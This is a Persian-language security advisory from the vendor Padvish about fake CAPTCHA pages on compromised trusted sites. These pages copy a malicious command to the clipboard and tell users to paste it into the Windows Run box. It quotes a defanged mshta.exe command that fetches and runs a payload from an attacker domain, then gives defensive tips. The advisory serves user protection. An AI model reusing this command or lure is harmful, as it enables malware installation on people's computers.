هشدارهای امنیتی پادویش

‏‫‏‫حملات Fake CAPTCHA – تهدیدی واقعی و رو به‌گسترش

⚠️ اختصاصی امن‌پرداز

در روزهای اخیر، نوع جدیدی از حملات سایبری شناسایی شده‌اند که صفحات CAPTCHA جعلی را به منظور فریب کاربران به کار می‌گیرند. مهاجمان نیز از این صفحات به‌ عنوان طعمه‌ای برای اجرای فرامین مخرب در ویندوز استفاده می‌کنند.

طعمه‌سازی با CAPTCHA جعلی

در موارد مشاهده شده، سایت‌های پر مخاطب و مورد اعتماد کاربران ایرانی تحت نفوذ قرار گرفته یا کد مخرب به آنها تزریق می‌شود. بدین ترتیب، زمانی که کاربر به‌صورت عادی و مستقیم وارد یک سایت قابل اعتماد می‌شود، با صفحه CAPTCHA جعلی مواجه می‌شود که از نظر ظاهری کاملاً شبیه CAPTCHA (با نمایش پیام “I’m not a robot”) واقعی است.

این CAPTCHA جعلی به‌گونه‌ای طراحی شده که طبیعی و معتبر به‌نظر برسد و چون در بستر یک دامنه آشنا و قابل اعتماد نمایش داده می‌شود، کاربر به سادگی و بدون تردید با آن تعامل می‌کند. همین اعتماد، نقطه‌ی اصلی سوءاستفاده مهاجمان برای آغاز زنجیره حمله است.

وقتی کاربر وارد چنین سایتی می‌شود، صفحه‌ای ظاهر می‌شود که می‌گوید باید ثابت کنید «شما ربات نیستید» (CAPTCHA). اکثر کاربران تصور می‌کنند CAPTCHA بخشی از امنیت سایت است و با کلیک کردن روی چک‌باکس، آن را حل می‌کنند.

پشت صحنه چه اتفاقی می‌افتد؟

با وارد کردن CAPTCHA توسط کاربر، سایت به‌طور مخفی یک فرمان مخرب را در clipboard کاربر کپی می‌کند. سپس صفحه به کاربر دستور می‌دهد:

  • کلید Windows + R را فشار دهید.
  • کلید Ctrl + V را بزنید تا محتویات کلیپ‌بورد در پنجره “Run” پیست شود.
  • سپس Enter را فشار دهید.

یکی از کلیدهای فنی این حمله استفاده از ابزار قانونی ویندوز به نام mshta.exe است. فرمانی که به‌ صورت مخفی در کلیپ‌بورد قرار می‌گیرد معمولاً مشابه دستور زیر است:

C:\Windows\system32\mshta.exe” https://et[.]xrhu7[.]ru/mf[.]check?t=3j5x71es

mshta.exe یک ابزار قانونی ویندوز است که برای اجرای دستورهای HTML کاربرد دارد، اما در اینجا با استفاده از آن مهاجمان فایل مخربی را از سایت خود دانلود و اجرا می‌کنند. نام فایل ممکن است به‌ظاهر بی‌خطر به‌نظر برسد، اما در واقع کد رمزگذاری‌ شده‌ PowerShell است که بدون اطلاع کاربر اجرا و بدافزار را بارگذاری می‌کند.

captcha

راهکارهای مقابله

صفحات CAPTCHA جعلی که باعث می‌شوند خودتان بدافزار نصب کنید، در حال فراگیر شدن هستند و خطر قابل توجهی برای همه کاربران اینترنتی محسوب می‌شوند.

✅ به یاد داشته باشید:

هیچ سایت قانونی از شما نمی‌خواهد فرمانی را در سیستم خود اجرا کنید تا ثابت کنید «ربات نیستید». در صورت مواجهه با چنین موردی، به احتمال قوی در معرض حمله هستید و لازم است که فورا صفحه را ببندید و وارد آن دستور نشوید.

✅ برای اینکه فریب حملات مذکور را نخورید، حتماً این نکات را رعایت کنید:

  • به هیچ‌وجه دستورات سایت را در Run یا PowerShell اجرا نکنید، حتی اگر سایت معتبر به‌ نظر برسد.
  • JavaScript را روی سایت‌های ناشناس غیرفعال کنید تا از کپی ناخواسته به clipboard جلوگیری کند.
  • در صورت مشاهده CAPTCHA در سایتی غیر منتظره، بهتر است صفحه را ترک کنید.

مطالب مرتبط

موج جدید حملات به سازمان‌های ایران: انتشار فایل‌های آلوده از طریق لینک‌های کمکی وب‌سایت Soft98

Security Alert

مراقب کمپین فیشینگ “کالا برگ” باشید!

درب پشتی در کتابخانه XZ

متن‌باز بودن دلیلی بر امن بودن نیست! کشف درب‌پشتی در کتابخانه متن‌باز محبوب کاربران لینوکس